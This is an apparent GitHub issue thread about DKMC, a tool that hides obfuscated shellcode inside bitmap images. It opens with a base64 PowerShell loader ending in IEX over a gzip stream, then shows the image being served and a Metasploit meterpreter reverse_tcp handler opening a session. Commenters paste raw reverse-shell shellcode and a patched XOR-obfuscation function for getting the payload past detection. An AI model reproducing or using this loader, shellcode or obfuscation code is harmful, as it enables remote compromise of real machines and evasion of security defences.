BEACsANQBiADEAOQB1AHUAbgBOAEYAMQBsAHAAegA2AC8AbQBVAHYAagB2ADQAZQBaAGYATABLADUAKwBGAEkAMABaAHQAawBpAGwAYgBqAG8AVwBEAGgANQBIAG4ATgBGAC8AegBYAFIAcQB4AHoARgBZACsATQAyAGUAdgA1ADMASQBhAEkAcABkAEMAZQBwAHoAUgBoAFEAWgBXAHkAOQBqAHAARwBJAGUASgBRAEkATwBkAFYAWgBuADAATQAyADcAYgBLAEMAUQBqAGIAdwBHAEYARwB0AFcASABIAEoAZQBOAFYAdAAwADcAQwA5AEUALwBmAC8AWgB6AHgARQBHAFEAegB3AEsAeABRAEcAQgBVAG0AagBQAE0AeQBtACEAWABoAHQAdABWAE4AZQA1ACEAZwBxAG8AdQArAGgAYwBSAEcAVwBDAGgAUQBXAFoAZgBGAE0AYQA5ADIATgAzADAAMABzAGwAcQBjAEsAdQBXAFMAUQBZADYAVgBHAHIAagBFAEIAOABvAGgAZABFAGsAegBWAGEAeQBjAGEAdQBaAGEARgBFADMAcgBPAGQAeABlAHoAagBVAEwAcQBOAEwAVgBjAGgATgBuAEIAZABCAHkANAA1AFoASQBsAFoAWgA1AGcASQB3AGoAQwBPAGQAKwBCAGcARwBqADMARwBEAGkAawBpAE0AVwB3AHYANwBjAFoANwBNAHEAIQBHAHMAdABJAGkAMwBLAE8AVQB0AG4AdQBOAEkAZABNAG8ASQBqAEIAZwBsAGYAbQB6AHkAUwBHAEcAdQBaAE0ANAA3AG4AZwArADQAbQBHAFkAYwBFAHIAUQByADEATwBPAEIAMABoAGwAcABSAFYAbABtAFIAZQBuAFEARwBvAGYAVgBxAHMARgBVAGgATABhAHIARwA0AEYATQBCAHMAeABRAHEAawB1ADUAegBvAFYAMAB5AFoARgBLAGoARwBoAG0AcwBYADgAbQA5AFAAdwB5AHUAawBxAFkAeQB4AHAAYQBFAGsAagBtADcASwB0AFAAeAAvAGwAeQBiAHcAcQBsAEYARwBnAFAAMgA3ADIALwBaADQATwBRAHcAUABvAHcAZgBmAFMAUABRAHEAKwBuAFoAQgA5AFIARgBtAEwAWgBRAGwAbABPAE4AdQBTAEgAdQBVAHkANQBvADIASwBhAGEAMgB1ADkAaQByAGIATwA5AHIAYQAzAHQAaABtAGQAKwAyADMALwB0ADcAbgAxAG8AZgBHAGgAcwBpAFYAeABuAHUAZgBhAG0AUwBmAGEAdQBLAEoAegBhAEwARgBQAHQAMwByAFcATQB1ADQAUABUAC8AdQBuAGgAaABhAG0AYwAvADkAQwB6AEgAcABVAHEAcABoAHgAcABRADQAbQBxAGMAdQBaACEAeQBJAE4AUwBaAFEAYQBDAEcAUQAvAGIAWABuAHQAZAAzAFkAQgBNAGcAYQBPAFcAbwA5AHAAWABvAEQAYwA1AEYANABHAFIAdwBuAFgANgBoAEsAcQA4ADAATQBvAEoANQB0AE0ARgBOAG4AZAAzADEAcgBZAGMAOAB0AFAAUQBlAGQAYgBLAGEAbQBoAHYANwB3AHMAZQB3AGgAVABTAHIAOQBoADYASgA1AEQATwBkAE8AdwAyAEgAbgBZAGIARABaAFMAMAB4AHMAUAA3AEIAawBMAHoAZABoAFIAYQBJAHAAdgBiAHEAKwB1ADYAUgBoADkALwBoAFgAZAB0ACEATAB3AEkAWQBFAEYASABlAHoAUwBNAGcAcwA2AGQAZgA4AGwAUAB0AEsARAAvAEwAeAB0AGwAUwBzAGIANABGAC8ANABtAEcAOAA5AGoALwB6AEwANwBKAG8AWQBhADcAZwBwAG0ASwB4AFkAdgBCADMANgBMAHIARAA4AEcANgBaAEkAeQBqAFoANAArAGEAaABpAEgAUgBUADIAKwBDAGEAcwB5AFMAWgBkAHUAOABaAGQAVQBZAC8ANQBGADUAVwBkAGUAVwBLAGUANQByAHYAZgB4AG0AdAAvAGMAcwBEADYAWgB4AE8AaABHAFoAIQBrAHAAeABSADcAeABlAFEAVwAzADUASQBPAHoAZgBIADgAcgBUAGEAVwB1AFgANABzAHAAdgBzAGsAeQBjADgAUABhAHQAYQBUAGYAagB0AGgARABKAHoAbABvAHQAVABzAFgAdwB5ADgAbgArAGYARwA5AG0AagA5AHcAaAAzAFEANwBWACsAUwAxAFcAZgBLAEQAMQBCAEgASwBwAHQAcgBkAHcAVQBlAGMAbgBPAFYARwA1ADgAagBhAEYAKwBvAFQAdQBVAGQAIQBpAGoAMgBmAHkAQgBrAEUAZwBDACsAegArAG0AYwB4AEwAUwBRAE4AOABNADUAYQBqAHEALwBZAGMAOAAwAHEAYQBQAHcAUAAzAGEAaQBJADkAUgB3AEwAIQAhACEAPQAiAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiAEEAIgApACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==
Then on the tool notice that the payload is fetched:
(web)>>> run
[+] Starting web server on port 8080
10.0.0.153 - - [14/Sep/2017 16:44:35] "GET /output.bmp HTTP/1.1" 200 -
[+] Stopping web server
On the metasploit console:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 8080
lport => 8080
smsf exploit(handler) > set lhost 24.37.41.158
lhost => 24.37.41.158
msf exploit(handler) > exploit
[*] Started reverse handler on 24.37.41.158:8080
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 24.37.41.154
[*] Meterpreter session 1 opened (24.37.41.158:8080 -> 24.37.41.154:29608) at 2017-09-14 17:00:05 -0400
meterpreter >
from dkmc.
carnal0wnage
commented on August 23, 2024
I'm getting an issue where it wont let me paste the full amount of shellcode. any idea on that one?
(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x
it wont let me enter anymore text
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
I may be a limitation of your terminal. I used the same shellcode that you pasted and added more to it.
=================================================================================
| |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
| |
=================================================================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
debug Show debug output. More verbose
source Image source file path
shellcode Shellcode payload using \x41\x41 format
output Output file path
Current variable value:
debug = false
source = sample/default.bmp
shellcode =
output = output/output-1505429835.bmp
(generate)>>> set shellcode set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\xde\xad\xde\xad\xde\xad\xde\xad
[+] shellcode value is set.
(generate)>>> show
debug = false
source = sample/default.bmp
shellcode = set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\xde\xad\xde\xad\xde\xad\xde\xad
output = output/output-1505429835.bmp
(generate)>>>
The show command show the content of the "variable" which contain the whole string without issue. I tried on a cygwin terminal on Windows and Ubuntu terminal and both didn't had the issue. The input is captured using raw_input() function there is no limitation implemented on my side.
from dkmc.
carnal0wnage
commented on August 23, 2024
yup seems to be an osx-ism. works fine in ubuntu. if i track it down i'll do an additional comment.
ty!
from dkmc.
leosilberg
commented on August 23, 2024
Finally managed to get it to run. The problem seems to be in the random int generation as the hex value length was uneven. I worked round this by cutting the hex. This is my modified gen_shellcode function.
def gen_shellcode(self, shellcode):
key = self.gen_key()
self.ui.print_msg("Generating obfuscation key 0x%s" % key.encode("hex"))
shellcode = self.pad_shellcode(shellcode)
self.ui.print_msg(len(shellcode))
magic = self.gen_magic()
self.ui.print_msg("Generating magic bytes %s" % hex(magic))
self.ui.print_msg((hex(magic)[2:10]))
shellcode = hex(magic)[2:10].decode("hex") + shellcode
self.ui.print_msg(len(shellcode))
shellcode = self.xor_payload(shellcode, key)
self.ui.print_msg(len(shellcode))
size = len(shellcode)
shellcode = self.set_decoder(hex(magic)[2:10].decode("hex"), (size - 4)) + shellcode
self.ui.print_msg(len(shellcode))
for i in range(1, 5):
shellcode = shellcode.replace("[RAND" + str(i) + "]", self.gen_pop(hex(self.gen_magic())[2:10].decode("hex")))
self.ui.print_msg("Final shellcode length is %s (%d) bytes" % (hex(len(shellcode)), len(shellcode)))
if self.is_debug():
print
return shellcode
I'm sure this will solve the original error message of this thread
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
Interesting I'll try to reproduce the bug on my side. Kind of odd that hex function return a different output on Windows.
from dkmc.
leosilberg
commented on August 23, 2024
I think there's one still missing on line 73
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
fixed thanks.
from dkmc.
Related Issues (20)
- Shellcode Not Running...? HOT 4
- Not a bug HOT 1
- Not getting shell
- error while starting dkmc.py HOT 2
- I REMAKE YOUR TOOL!!! HOT 2
- option to generate a binary? HOT 1
- Embed the obfuscated shellcode for .apk (android)? HOT 1
- a
- o
- Not working on window 10
- Is it still working? HOT 1
- error HOT 2
- Malicious cat
- dkmc.py not executing
- cannot impot name 'ModuleObject '
- Something when wrong during the obfuscation. Wrong shellcode format? HOT 1
- Unable to load BMP file remotely
- GenModule instance has no attribute 'print_error' HOT 1
- Dkmc
- Can open dkmc.py HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from dkmc.